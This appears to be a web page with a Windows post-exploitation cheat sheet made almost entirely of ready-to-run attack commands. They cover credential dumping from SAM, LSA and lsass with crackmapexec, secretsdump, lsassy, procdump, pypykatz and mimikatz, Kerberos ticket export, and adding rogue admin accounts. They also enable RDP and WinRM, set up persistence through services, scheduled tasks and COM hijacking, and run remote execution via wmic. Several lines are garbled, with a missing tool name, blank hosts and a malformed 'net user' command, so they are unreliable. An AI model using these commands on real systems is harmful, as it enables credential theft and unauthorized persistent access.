Skip to content

Post-Ex Windows

Dump secrets


crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa


crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam

reg save hklm\sam .\sam reg save hklm\system .\system reg save hklm\security .\security 
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL


crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy

lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>

./ -u <user> -p <password> -t <ip>

pypykatz lsa minidump lsass.dmp

procdump.exe --accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt

.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit


.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit

Browser secrets


Create/add new local admin account

net user add <user> <pass>
net localgroup "Administrators" <user> /add

Enable WinRM

Enable-PSRemoting -SkipNetworkProfileCheck -Force

Enable RDP

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

add user to RDP group

net localgroup "Remote Desktop Users" <user> /add

Create service

New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic 
Start-Service syshell

sc \\ create ServiceName binpath=C:\windows\system32\calc.exe

\ is optional

To check if service working well, you can reboot like this:

wmic /node: os get buildnumber then

wmic /node: os where buildnumber="<Number>" call reboot

Execute binary using WMIC

wmic /node: process call create "C:\windows\system32\calc.exe"

/node is optional

Stop processus

Run this to get processid : sc \\ query ServiceName

then : wmic /node: process where processid=<PID> call terminate

/node is optional

and then taskkill /S /PID <PID> /f

/S is optional

Create Scheduled tasks

schtasks /create /S /tn <name> /sc once /sd 01/01/1910 /ru system /tr “C:\windows\system32\calc.exe”


schtasks /create /S /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30

ru , and /S is optional To check if tasks has been created run this schtasks /s /query /tn <name>

COM hijack

schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg

# Change to HKCU and change dll
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"

Disconnect User

rwinsta /server: <sessionId>

to get sessionId please run this qwinsta